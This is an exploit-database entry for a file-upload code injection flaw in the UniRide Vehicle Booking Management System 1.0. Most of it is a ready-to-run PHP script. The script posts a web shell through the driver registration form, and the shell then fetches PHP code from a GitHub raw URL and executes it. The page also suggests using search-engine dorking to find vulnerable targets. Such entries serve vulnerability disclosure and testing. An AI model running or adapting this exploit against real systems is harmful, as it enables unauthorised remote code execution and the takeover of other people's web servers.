Share
## https://sploitus.com/exploit?id=PACKETSTORM:189751
=============================================================================================================================================
    | # Title     : UniRide Vehicle Booking Management System 1.0 Code Injection Vulnerability                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
    | # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202303/kashipara.com_vehicle-management-zip.zip               |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] uses the CURL to Allow Remotely upload and run malicious file .
    
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php target.dz
    
    [+] PayLoad :
    
    <?php
    
    function file_upload($target_ip) {
        $file_name = "indoushka.php";
        $webshell_payload = "<?php
            \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';
            \$ch = curl_init();
            curl_setopt(\$ch, CURLOPT_URL, \$url);
            curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);
            \$output = curl_exec(\$ch);
            curl_close(\$ch);
            if (\$output) {
                include 'data://text/plain;base64,' . base64_encode(\$output);
            }
        ?>";
    
        $post_fields = array(
            
            'submit' => '',
            'drname' => 'indoushka',
            'drjoin' => '16/12/1986',
            'drmobile' => '0771818860',
            'drnid' => '336699',
            'drlicense' => '2009-2024',
            'drlicensevalid' => 'yes',
            'draddress' => 'yes',
    		'file' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),
    		
            'qty' => '1'
        );
    
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "$target_ip/newdriver.php");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
        $response = curl_exec($ch);
        curl_close($ch);
    
        echo "(+) Shell uploaded successfully.\n";
        echo "(+) Access the shell at: $target_ip/picture/\n";
    }
    
    if ($argc != 2) {
        echo "(+) Usage: php " . $argv[0] . " <target ip>\n";
        echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";
        exit(-1);
    }
    
    $target_ip = $argv[1];
    file_upload($target_ip);
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================